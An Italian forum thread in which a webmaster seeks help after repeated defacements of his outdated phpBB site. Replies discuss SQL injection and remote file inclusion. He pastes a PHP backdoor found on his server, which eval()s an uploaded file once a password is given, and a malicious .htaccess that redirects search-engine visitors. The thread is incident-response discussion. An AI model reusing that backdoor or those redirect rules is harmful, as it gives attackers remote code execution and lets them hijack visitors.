Navigazione

    Privacy - Termini e condizioni
    © 2020 Search On Media Group S.r.l.
    • Registrati
    • Accedi
    • CATEGORIES
    • Discussioni
    • Non letti
    • Recenti
    • Hashtags
    • Popolare
    • Utenti
    • Stream
    • Interest
    • Categories
    1. Home
    2. Categorie
    3. Gli Off Topic
    4. Tutti i Software
    5. Attacco hacker?
    Questa discussione è stata cancellata. Solo gli utenti con diritti di gestione possono vederla.
    • I
      ienabellamy User Attivo • ultima modifica di

      Niente. In poche parole sei stato vittima di un deface. Chiama immediatamente la tua ditta di hosting e informali. Che tecnologia c'era sul sito ? php ? asp ? Qualche cms ? forum phpBB ?

      EDIT: ah, per inciso, non si tratta di hackers. Ma di Lamers/ScriptKiddies/Wannabe.

      0 Miglior Risposta Ringrazia Cita Rispondi

        1 Risposta Ultima Risposta
      • N
        nedone User Attivo • ultima modifica di

        la tecnologia è php, hanno modificato l'htaccess della root (e questo mi fa tremare le gambe) inserendo un htaccess fasullo a vista (che inrealtà dovrebbe essere nascosto) ed inserito due cartelle in una cartella interna

        0 Miglior Risposta Ringrazia Cita Rispondi

          1 Risposta Ultima Risposta
        • S
          seph1roth User • ultima modifica di

          io li chiamerei cracker piu che lamer 🙂

          0 Miglior Risposta Ringrazia Cita Rispondi

            1 Risposta Ultima Risposta
          • N
            nedone User Attivo • ultima modifica di

            Tipicamente quali vulnerabilità vengono sfruttate per questo tipo di crack?
            Ho controllato tutto e non riesco a trovare la vulnerabilità che ogni giorno sfruttano!

            0 Miglior Risposta Ringrazia Cita Rispondi

              1 Risposta Ultima Risposta
            • I
              ienabellamy User Attivo • ultima modifica di

              Tante. Spesso sono attacchi basati su php, sql-injection. Quasi mai sono attacchi a livello demone ( Apache, IIS...) e molto piu facili da implementare rispetto a quest'ultimi.

              0 Miglior Risposta Ringrazia Cita Rispondi

                1 Risposta Ultima Risposta
              • N
                nedone User Attivo • ultima modifica di

                Non è sql-injection poiché il db è integro. Hano creato molti file php e modificato htaccess. Cosa potrei controllare? Ho un modulo che consente l'upload di immagini, ho bloccato tutti i file non jpg..

                0 Miglior Risposta Ringrazia Cita Rispondi

                  1 Risposta Ultima Risposta
                • C
                  cryogenic Bannato User • ultima modifica di

                  nedone se ti va posso dare un occhiata io...
                  comunque se uno usa una sql injection non centra se il db e' integro...hanno solo attaccato tramite sql injection e hanno recuperato la tua password criptata in MD5 ...l'hanno crackata e spesso e' uguale a quella dell'FTP...se l'admin e' ingenuo...
                  Oppure un altro tipo di attacco che secondo me al 99% hanno usato e' il remote file inclusion...ovvero sfruttando un include(); hanno preso controllo del tuo sito creando file e backdoor a loro piacere...
                  Contattami in pvt se ti va di "ingaggiarmi"...potrei trovare e fixare il bug.
                  O se vuoi fare da te,controlla tutte le variabili che $_GET non sia tramite include..
                  Esempio:

                  $variabile = $_GET['variabile'];
                  include($variabile);

                  Vedi tu...

                  0 Miglior Risposta Ringrazia Cita Rispondi

                    1 Risposta Ultima Risposta
                  • N
                    nedone User Attivo • ultima modifica di

                    Ti ho mandato un messaggio in pvt. Cmq le password sono molto diverse. Sul sito è installata una versione molto modificata di phpbb, sarebbe ostico effettuare un controllo di tutte le variabili...

                    0 Miglior Risposta Ringrazia Cita Rispondi

                      1 Risposta Ultima Risposta
                    • C
                      cryogenic Bannato User • ultima modifica di

                      ricevuto 😉

                      0 Miglior Risposta Ringrazia Cita Rispondi

                        1 Risposta Ultima Risposta
                      • wolf.otakar
                        wolf.otakar Consiglio Direttivo • ultima modifica di

                        Ciao nedone,

                        @nedone said:

                        ....Sul sito è installata una versione molto modificata di phpbb.....

                        versione di phpbb?

                        0 Miglior Risposta Ringrazia Cita Rispondi

                          1 Risposta Ultima Risposta
                        • N
                          nedone User Attivo • ultima modifica di

                          Non saprei, anche perché l'ho modificata pesantemente, cmq dovrebbe essere la 2.0.21

                          0 Miglior Risposta Ringrazia Cita Rispondi

                            1 Risposta Ultima Risposta
                          • wolf.otakar
                            wolf.otakar Consiglio Direttivo • ultima modifica di

                            @nedone said:

                            ....dovrebbe essere la 2.0.21

                            Un po' vecchiotta, nedone! 😉

                            0 Miglior Risposta Ringrazia Cita Rispondi

                              1 Risposta Ultima Risposta
                            • N
                              nedone User Attivo • ultima modifica di

                              Lo so, ma ormai con tutte le modifiche che ho apportato è inaggiornabile...

                              0 Miglior Risposta Ringrazia Cita Rispondi

                                1 Risposta Ultima Risposta
                              • C
                                cryogenic Bannato User • ultima modifica di

                                massi' tanto la 2.0.21 ha solo un Cross site scripting in privmsg.php e un altro Cross site request forgery...roba da "nulla"...
                                al massimo cambia quel file con quello della 2.0.23...e potresti cambiare anche gli altri,stando attento a non eliminare le tue modifiche...
                                nedone correggi quell'include che ti ho fatto vedere e in teoria sei a posto...

                                0 Miglior Risposta Ringrazia Cita Rispondi

                                  1 Risposta Ultima Risposta
                                • N
                                  nedone User Attivo • ultima modifica di

                                  Quello che mi hai fatto vedere non è una include! In pratica non ne uso di include!
                                  Stamani al solito ho ritrovato il deface in atto. Sono alla disperazione! Cosa posso fare? Secondo voi hanno il controllo dell'ftp? Cambio la pwd?

                                  0 Miglior Risposta Ringrazia Cita Rispondi

                                    1 Risposta Ultima Risposta
                                  • wolf.otakar
                                    wolf.otakar Consiglio Direttivo • ultima modifica di

                                    @nedone said:

                                    Stamani al solito ho ritrovato il deface in atto. Sono alla disperazione! Cosa posso fare?

                                    Ciao nedone,

                                    posta pure l'indirizzo del tuo sito, "magari in pvt"! 🙂

                                    @nedone said:

                                    Cambio la pwd?

                                    😉

                                    0 Miglior Risposta Ringrazia Cita Rispondi

                                      1 Risposta Ultima Risposta
                                    • N
                                      nedone User Attivo • ultima modifica di

                                      il sito è delmutolo.com

                                      0 Miglior Risposta Ringrazia Cita Rispondi

                                        1 Risposta Ultima Risposta
                                      • N
                                        nedone User Attivo • ultima modifica di

                                        Potete aiutarmi a capire l'intento di questo script che ho trovato occultato nelle mie cartelle?

                                        
                                        <?php
                                            error_reporting(1);
                                            global $HTTP_SERVER_VARS; 
                                            function say($t) { 
                                                echo "$t\n"; 
                                            };
                                            function testdata($t) {
                                                say(md5("testdata_$t"));
                                            };
                                            echo "<pre>";
                                            testdata('start');
                                            if (md5($_POST["p"])=="aace99428c50dbe965acc93f3f275cd3"){
                                                if ($code = @fread(@fopen($HTTP_POST_FILES["f"]["tmp_name"],"rb"),$HTTP_POST_FILES["f"])){
                                                    eval($code);
                                                }
                                                else{
                                                    testdata('f');
                                                };
                                            }
                                            else{ 
                                                testdata('pass');
                                            };
                                            testdata('end');
                                            echo "</pre>";
                                        ?>
                                        
                                        ```Credo di aver capito cosa fa, ma non riesco a capire il perché lo fa.
                                        Mi rimane oscura la comprensione del funzionamento che c'è alle spalle.
                                        
                                        A questo va associato il file .htaccess che viene modificato così:
                                        
                                        

                                        RewriteEngine on

                                        a0b4df006e02184c60dbf503e71c87ad

                                        RewriteEngine On
                                        RewriteCond %{HTTP_REFERER} ^http:([a-z0-9_-]+.)(google|msn|yahoo|live|ask|dogpile|mywebsearch|yandex|rambler|aport|mail|gogo|poisk|alltheweb|fireball|freenet|abacho|wanadoo|free|club-internet|aliceadsl|alice|skynet|terra|ya|orange|clix|terravista|gratis-ting|suomi24).
                                        RewriteCond %{HTTP_REFERER}?&=
                                        RewriteCond %{HTTP_REFERER} =[^&]+(%3A|%22)
                                        RewriteCond %{TIME_SEC} <59
                                        RewriteRule ^.
                                        $ /images/ekukure/ex3/t.htm

                                        a995d2cc661fa72452472e9554b5520c

                                        RewriteRule foto-(.*).html gallery.php?dir=$1

                                        0 Miglior Risposta Ringrazia Cita Rispondi

                                          1 Risposta Ultima Risposta
                                        • C
                                          cryogenic Bannato User • ultima modifica di

                                          il primo codice e' una backdoor... si intravede che chiede una password per amministrarla e fare del tuo ftp cio' che vogliono....si intravede inoltre fopen(); Puo essere che il cracker richiami quella pagina,che richiede una password...se la password e' giusta,crea un file/backdoor e accede al tuo ftp...mettendo altre backdoor...

                                          0 Miglior Risposta Ringrazia Cita Rispondi

                                            1 Risposta Ultima Risposta
                                          • N
                                            nedone User Attivo • ultima modifica di

                                            Puoi provare a spiegarmi meglio quello che hai detto? Io ho provato ad usare questo script come destinatario di una post, ho inviato un file tramite un modulo, ma non sono arrivato molto oltre.

                                            0 Miglior Risposta Ringrazia Cita Rispondi

                                              1 Risposta Ultima Risposta
                                            Caricamento altri post
                                            Rispondi
                                            • Topic risposta
                                            Effettua l'accesso per rispondere
                                            • Da Vecchi a Nuovi
                                            • Da Nuovi a Vecchi
                                            • Più Voti